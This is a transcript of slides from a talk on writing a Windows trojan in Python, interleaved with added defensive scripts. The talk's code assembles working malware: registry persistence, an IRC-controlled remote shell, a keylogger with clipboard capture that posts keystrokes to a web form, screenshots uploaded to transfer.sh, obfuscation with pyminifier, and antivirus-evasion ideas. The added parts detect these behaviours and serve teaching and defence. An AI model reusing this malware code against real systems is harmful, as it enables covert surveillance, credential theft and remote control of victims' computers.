Slide 1

Hello! I'm Yan Orestes, an 18-year-old Brazilian software developer. @yanorestes

Slide 2

Understanding how a malware works using Python

Slide 3

What is malware?

Slide 4

Malware: malicious software

Slide 5

It's not only viruses! (diagram: Virus and Ransomware shown as kinds of Malware)

Slide 6

Which one to pick?

Slide 7

Trojan Horse

Slides 8-11

How? Python. Why? Why not?

Slide 12

Victim: Windows (8)

Slide 13

- James Lovelock

Slide 14

1. Ensuring the continuous execution of the malware

Slide 15

Hiding the malware in other programs

Slide 16

Modifying the Windows Registry

Slide 17

Registry: keys and subkeys

Slides 18-19

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Slides 20-22

How to do this using Python?
● winreg
● os

Slides 23-28

```python
from os.path import realpath
from winreg import *

file_path = realpath(__file__)
run = r'Software\Microsoft\Windows\CurrentVersion\Run'
try:
    key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE)
except PermissionError:
    # Not running as administrator :(
    pass
else:
    SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
    key.Close()
```
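
An added audit script, not code from the talk, that looks at the persistence technique above from the defender's side: it reads the same Run key and flags values that launch a script interpreter, run a script file directly, or live in a user-writable directory. The function names and the sample entries are constructed for this example; the winreg enumeration only runs on Windows.

```python
import sys
from pathlib import PureWindowsPath

# Constructed sample of (value name, command) pairs as read from a Run key.
# These are made-up entries for the example, not data from a real machine.
SAMPLE_RUN_ENTRIES = [
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("MALWARE", r"C:\Users\alice\AppData\Roaming\update.py"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater", r"C:\Python37\pythonw.exe C:\Users\alice\Downloads\svc.pyw"),
]

RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
SCRIPT_SUFFIXES = {".py", ".pyw", ".vbs", ".js", ".bat", ".ps1"}
INTERPRETERS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def audit_run_entry(name, command):
    """Return the reasons an autorun entry deserves a closer look (empty list = nothing odd).

    A value like the slides' 'MALWARE' entry pointing at a .py file is flagged twice:
    it runs a script directly and it lives under the user's profile.
    """
    reasons = []
    # Naive tokenizer: strip quotes and split on spaces; good enough for typical Run values.
    for token in command.replace('"', "").split():
        p = PureWindowsPath(token)
        if p.name.lower() in INTERPRETERS:
            reasons.append("launches a script interpreter: " + p.name)
        if p.suffix.lower() in SCRIPT_SUFFIXES:
            reasons.append("runs a script file directly: " + p.name)
    if any(marker in command.lower() for marker in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    return reasons


def audit_entries(entries):
    """Map each flagged value name to its reasons; clean entries are left out."""
    result = {}
    for name, cmd in entries:
        reasons = audit_run_entry(name, cmd)
        if reasons:
            result[name] = reasons
    return result


def enumerate_run_keys():
    """Read the real HKLM and HKCU Run keys. Windows only; returns [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg  # only importable on Windows
    found = []
    for hive, label in ((winreg.HKEY_LOCAL_MACHINE, "HKLM"), (winreg.HKEY_CURRENT_USER, "HKCU")):
        try:
            key = winreg.OpenKey(hive, RUN_SUBKEY)  # read access is the default
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    name, value, _type = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    break
                found.append((label + "\\" + name, str(value)))
                index += 1
    return found


if __name__ == "__main__":
    entries = enumerate_run_keys() or SAMPLE_RUN_ENTRIES
    for name, reasons in audit_entries(entries).items():
        print(name, "->", "; ".join(reasons))
```

A user-writable location on its own is weak evidence (the OneDrive entry in the sample is legitimate and still gets that hit); the interpreter and script-file reasons are the ones worth an immediate look.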

Slide 29

How to establish communication between attacker and victim?

Slide 30

2. Connecting the victim to the attacker

Slide 31

Direct connection between attacker and victim

Slide 32

Using external services (like Twitter)

Slide 33

Connecting through an IRC network

Slides 34-35

How to do this using Python?
● socket

Slides 36-37

```python
import socket

class AttackerConnection:
    def __init__(self, irc_address):
        self.socket = socket.socket()
        self.socket.connect(irc_address)

connection = AttackerConnection(('irc.pycon.net', 6667))
```

That's it?

Slides 38-43

```python
import socket
import re

class AttackerConnection:
    def __init__(self, irc_address, nick):
        self.socket = socket.socket()
        self.socket.connect(irc_address)
        self.register_user(nick)
        self.nick = nick

    def send_command(self, cmd):
        cmd += '\r\n'
        self.socket.send(cmd.encode('utf8'))

    def receive_command(self):
        msg = self.socket.recv(4096)
        msg = msg.decode('utf8', errors='ignore')
        self.answer_ping(msg)
        return msg

    def register_user(self, nick):
        self.send_command('NICK ' + nick)
        self.send_command('USER {0} {0} {0} :{0}'.format(nick))

    def answer_ping(self, msg):
        # The server drops clients that do not answer PING with a matching PONG
        match = re.match(r'PING :(.*)', msg)
        if match:
            pong = match.group(1)
            self.send_command('PONG :' + pong)
```

Slide 44

Main loop

```python
connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot')
while True:
    cmd = connection.receive_command()
    pass  # Handle command
```

Slide 45

How to take control of the victim's computer?

Slide 46

3. Executing commands on the victim's computer

Slide 47

Using os.system()

Slides 48-49

Using the subprocess module


Slides 52-53

```python
from subprocess import run, PIPE, STDOUT

def run_command_on_shell(cmd):
    process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT)
    response = process_complete.stdout.decode('utf8', errors='ignore')
    return response
```

but what about the communication with the attacker?

Slides 54-56

```python
import re

class AttackerConnection:
    # Code omitted
    def parse_msg(self, msg):
        # Matches ":nick!user@host PRIVMSG <our nick> :text" and captures nick and text
        match = re.match(r':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg)
        return match

    def receive_command(self):
        msg = self.socket.recv(4096).decode('utf8', errors='ignore')
        self.answer_ping(msg)
        msg_match = self.parse_msg(msg)
        if msg_match:
            return msg_match.groups()
        return None, None
    # Code omitted
```

Slides 57-61

```python
import re

connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot')
commands = {'!shell': run_command_on_shell}
re_commands = '|'.join(commands.keys())
while True:
    nick_from, cmd = connection.receive_command()
    if cmd is None:
        continue  # not a private message addressed to the bot
    cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd)
    if cmd_match:
        cmd_type, args = cmd_match.groups()
        response = commands[cmd_type](args)
    else:
        response = 'Command not found'
    connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
```
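
An added detection example, not code from the talk, covering the IRC connection (slides 36-43) and the command loop (slides 54-61): it parses captured IRC lines with the same message shape the bot's parse_msg() expects and reports bang-prefixed commands, the repeated-field USER registration the register_user() template produces, and a session that registers but never JOINs a channel. The session capture and the function names are constructed for this example.

```python
import re

# Constructed capture of one IRC session seen from the infected host.
# "C" = sent by the client, "S" = received from the server. Made up for this example.
SAMPLE_SESSION = [
    ("C", "NICK MalwareBot"),
    ("C", "USER MalwareBot MalwareBot MalwareBot :MalwareBot"),
    ("S", "PING :irc.example.net"),
    ("C", "PONG :irc.example.net"),
    ("S", ":operator!op@203.0.113.9 PRIVMSG MalwareBot :!shell whoami"),
    ("C", "PRIVMSG operator :victim-pc\\alice"),
    ("S", ":operator!op@203.0.113.9 PRIVMSG MalwareBot :!screenshot shot.png"),
    ("S", ":friend!f@192.0.2.5 PRIVMSG MalwareBot :hello there"),
]

# Same message shape the bot's parse_msg() expects: ":nick!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)
# Bot-style command: a bang prefix, a word, optional arguments (e.g. "!shell whoami").
BOT_COMMAND_RE = re.compile(r"^!(?P<cmd>[a-z_]+)(?: (?P<args>.*))?$")
USER_RE = re.compile(r"^USER (\S+) (\S+) (\S+) :(.*)$")


def parse_privmsg(line):
    """Return the PRIVMSG fields as a dict, or None for any other message."""
    m = PRIVMSG_RE.match(line)
    return m.groupdict() if m else None


def find_c2_commands(session):
    """Alert on inbound private messages whose text looks like a bot command."""
    alerts = []
    for direction, line in session:
        if direction != "S":
            continue
        msg = parse_privmsg(line)
        if msg is None:
            continue
        cmd = BOT_COMMAND_RE.match(msg["text"])
        if cmd:
            alerts.append({"from": msg["nick"], "host": msg["host"],
                           "command": cmd.group("cmd"), "args": cmd.group("args")})
    return alerts


def templated_user_line(session):
    """True if the USER registration repeats one token in every field: the fingerprint
    of a hard-coded 'USER {0} {0} {0} :{0}' template rather than a real IRC client."""
    for direction, line in session:
        m = USER_RE.match(line) if direction == "C" else None
        if m and len(set(m.groups())) == 1:
            return True
    return False


def no_channel_joined(session):
    """A client that registers, never JOINs a channel and only trades private messages is bot-like."""
    sent = [line for d, line in session if d == "C"]
    registered = any(l.startswith("NICK ") for l in sent) and any(l.startswith("USER ") for l in sent)
    return registered and not any(l.startswith("JOIN ") for l in sent)


def session_verdict(session):
    """Combine the three indicators into one summary for the analyst."""
    return {
        "commands": find_c2_commands(session),
        "templated_user": templated_user_line(session),
        "no_join": no_channel_joined(session),
    }
```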

Slide 62

4. Capturing user data in real time

Slide 63

Capturing pressed keys (keylogger)

Slides 64-67

How to do this using Python?
● keyboard https://github.com/boppreh/keyboard
● requests http://docs.python-requests.org/en/master
● pyperclip https://github.com/asweigart/pyperclip

Slides 68-70

```python
import keyboard

pressed_keys = []
keyboard.on_press(lambda k: pressed_keys.append(k.name))
```

Typing "Hello, world!" is captured as: shiftHello,spaceworldshift!

Slides 71-75

```python
import keyboard

pressed_keys = []
special_keys = {'space': ' ', 'enter': '\n'}

def handle_key(k):
    # A key pressed with shift held: drop the 'shift' entry recorded just before it
    if k.modifiers and 'shift' in k.modifiers:
        pressed_keys.pop()
    key = k.name
    if len(key) > 1:
        key = special_keys.get(key, '<< {} >>'.format(key))
    pressed_keys.append(key)

keyboard.on_press(handle_key)
```

and how does the attacker access this?

Slides 76-79

```python
from requests import post

url_form = '#linkToForm#'  # placeholder kept from the slides
def handle_key(k):
    # Code omitted
    if len(pressed_keys) >= 100:
        typed_text = ''.join(pressed_keys)
        pressed_keys.clear()
        post(url_form, {'entry.1269107664': typed_text})
```

Slides 80-81

Golden touch

```python
import keyboard
from pyperclip import paste

def handle_copypaste():
    copied_text = paste()
    pressed_keys.extend(list(copied_text))

keyboard.add_hotkey('ctrl+c', handle_copypaste)
```

Slide 82

Capturing the victim's screen

Slides 83-86

How to do this using Python?
● pyscreenshot https://github.com/ponty/pyscreenshot
● os
● requests

Slides 87-89

```python
from pyscreenshot import grab_to_file

def take_screenshot(filename):
    grab_to_file(filename)

commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot}
```

and how does the attacker access this?

Slides 90-92

```python
from os import remove
from pyscreenshot import grab_to_file
from requests import post

def take_screenshot(filename):
    grab_to_file(filename)
    with open(filename, 'rb') as f:
        r = post('https://transfer.sh', files={filename: f})
    response = r.text if r.status_code == 200 else 'Upload error'
    remove(filename)  # delete the local copy once the upload has finished
    return response
```
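
An added example from the monitoring side, not code from the talk, covering both exfiltration paths above: the keylogger's form POST (slides 76-79) and the transfer.sh upload (slides 90-92). It scans a constructed proxy log for POSTs from a scripted user agent to a form-submission or drop endpoint and reports how regularly they recur. The log format, the form id and the addresses are assumptions made for this example; treating the target as a Google Forms endpoint is inferred from the entry.NNN field name on the slide.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log, one request per line:
#   <epoch> <client_ip> <method> <url> <status> <user_agent>
# The form id and the addresses are made up for this example.
SAMPLE_PROXY_LOG = """\
1700000000 10.0.0.5 GET https://www.example.com/ 200 Mozilla/5.0 (Windows NT 10.0) Firefox/115.0
1700000012 10.0.0.5 POST https://docs.google.com/forms/d/e/1FAIpQLSexample/formResponse 200 python-requests/2.31.0
1700000190 10.0.0.5 POST https://docs.google.com/forms/d/e/1FAIpQLSexample/formResponse 200 python-requests/2.31.0
1700000371 10.0.0.5 POST https://docs.google.com/forms/d/e/1FAIpQLSexample/formResponse 200 python-requests/2.31.0
1700000400 10.0.0.5 POST https://transfer.sh/ 200 python-requests/2.31.0
1700000420 10.0.0.7 POST https://docs.google.com/forms/d/e/1FAIpQLSother/formResponse 200 Mozilla/5.0 (Windows NT 10.0) Chrome/120.0
"""

# requests identifies itself as python-requests/<version> unless the caller overrides it.
SCRIPTED_UA_RE = re.compile(r"^(python-requests|python-urllib|curl|wget)/", re.I)
# Public drop box used on the slides, and the Google Forms submission endpoint.
DROP_HOSTS = {"transfer.sh"}
FORM_RE = re.compile(r"^https://docs\.google\.com/forms/.*/formResponse$")


def parse_log(text):
    """Yield one dict per log line."""
    for line in text.splitlines():
        ts, client, method, url, status, ua = line.split(" ", 5)
        yield {"ts": int(ts), "client": client, "method": method,
               "url": url, "status": int(status), "ua": ua}


def find_exfil(text):
    """Flag scripted POSTs to form or drop endpoints, grouped by client and host.

    The mean gap between posts is reported because a keylogger that flushes every
    N keystrokes produces a steady trickle of small submissions.
    """
    groups = defaultdict(list)
    for rec in parse_log(text):
        if rec["method"] != "POST" or not SCRIPTED_UA_RE.match(rec["ua"]):
            continue
        host = urlparse(rec["url"]).hostname
        if host in DROP_HOSTS or FORM_RE.match(rec["url"]):
            groups[(rec["client"], host)].append(rec["ts"])
    alerts = []
    for (client, host), times in sorted(groups.items()):
        gaps = [b - a for a, b in zip(times, times[1:])]
        alerts.append({"client": client, "host": host, "posts": len(times),
                       "mean_gap_s": sum(gaps) / len(gaps) if gaps else None})
    return alerts
```

The browser-originated submission from 10.0.0.7 is deliberately not flagged: the user agent, not the destination, separates a person filling in a form from a script posting to one.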

Slide 93

Extra!

Slide 94

5. Code obfuscation

Slide 95

Bytecode compilation

Slides 96-100

Using pyminifier

```shell
pyminifier -O -o level1.py malware.py
pyminifier -O --nonlatin -o level2.py malware.py
pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py
pyminifier -O --nonlatin --replacement-length=100 --gzip -o level4.py malware.py
```
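
An added example, not from the talk or from pyminifier, of how the four obfuscation levels above can be spotted statically: it parses a Python source with ast (never executing it) and reports non-Latin identifiers, identifiers as long as --replacement-length produces, and exec/eval fed by decompressed or decoded data. The sample sources are constructed for this example and are not real pyminifier output.

```python
import ast

# Constructed samples. OBFUSCATED sketches what pyminifier -O --nonlatin --gzip output
# looks like (non-Latin identifiers, exec of decompressed data); it is written for this
# example and is not the tool's real output. Nothing here is ever executed, only parsed.
PLAIN = "import socket\n\ndef connect(addr):\n    s = socket.socket()\n    s.connect(addr)\n    return s\n"
OBFUSCATED = (
    "import zlib, base64\n"
    "def 丂丂丂丂丂丂(乃乃乃乃):\n"
    "    return 乃乃乃乃\n"
    "exec(zlib.decompress(base64.b64decode(b'eJwDAAAAAAE=')))\n"
)
LONG_NAMES = "def " + "q" * 100 + "():\n    return 1\n"  # --replacement-length=100 style

EXEC_LIKE = {"exec", "eval"}
DECODER_ATTRS = {"decompress", "b64decode", "decode"}


def collect_identifiers(tree):
    """Every name the source defines or references (variables, functions, classes, parameters)."""
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            names.add(node.id)
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            names.add(node.name)
        elif isinstance(node, ast.arg):
            names.add(node.arg)
    return names


def exec_of_decoded(tree):
    """True if exec()/eval() is fed, directly or nested, by a decode/decompress call."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id in EXEC_LIKE:
            for inner in ast.walk(node):
                if (isinstance(inner, ast.Call) and isinstance(inner.func, ast.Attribute)
                        and inner.func.attr in DECODER_ATTRS):
                    return True
    return False


def score_source(src, long_ident=40):
    """Return the obfuscation indicators found in a Python source string (empty = none)."""
    tree = ast.parse(src)  # parse only; the sample is never run
    idents = collect_identifiers(tree)
    findings = []
    non_ascii = [i for i in idents if any(ord(c) > 127 for c in i)]
    if non_ascii:
        findings.append("non-ASCII identifiers: %d" % len(non_ascii))
    long_names = [i for i in idents if len(i) >= long_ident]
    if long_names:
        findings.append("very long identifiers: %d (max %d chars)"
                        % (len(long_names), max(len(i) for i in long_names)))
    if exec_of_decoded(tree):
        findings.append("exec/eval of decoded or decompressed data")
    return findings
```

Bytecode-only distribution (the previous slide) defeats this source-level check, so it belongs next to a .pyc decompiler or a process-level monitor rather than in place of one.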

Slides 101-103

6. Privilege escalation
● Brute force
● Code injection

Slide 104

How can users protect themselves?

Slide 105

Precaution

Slide 106

Control of connections

Slide 107

Antivirus?

Slides 108-109

- Anonymous expert in everything

Is it?

Slides 110-113

Antivirus is annoying
● Unexpected renewal costs
● System problems :(

Slides 114-116

2010 - McAfee case
2011 - MSE case
2012 - Sophos case

Slides 117-118

Low effectiveness?
2006 - 40-50%
2007 - 20-30%
2013 - 91.1-99.9%

Slide 119

Humans fail

Slides 120-121

Unless you...
● Don't share files and/or links with anyone
● Don't allow anyone besides you to use your computer
● Don't use the Internet for shopping, adult entertainment or online games
● Never use public WiFi
● Don't share your private WiFi with anyone
● Never click on any ads
● Always use extremely strong passwords and never reuse them across applications
● Don't use a smartphone
● Don't download anything from the Internet
● Don't use an operating system

Slides 122-125

7. Protection against antivirus
● Signature => Polymorphic code
● Sandbox => Detection (mouse) https://github.com/boppreh/mouse/
● Heuristic method => ?

Slide 126

Thank you! Any questions?
https://speakerdeck.com/yanorestes/creating-a-malware-using-python
[email protected]